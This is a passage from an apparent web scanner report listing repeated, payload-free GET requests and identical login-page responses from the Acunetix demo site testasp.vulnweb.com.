type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
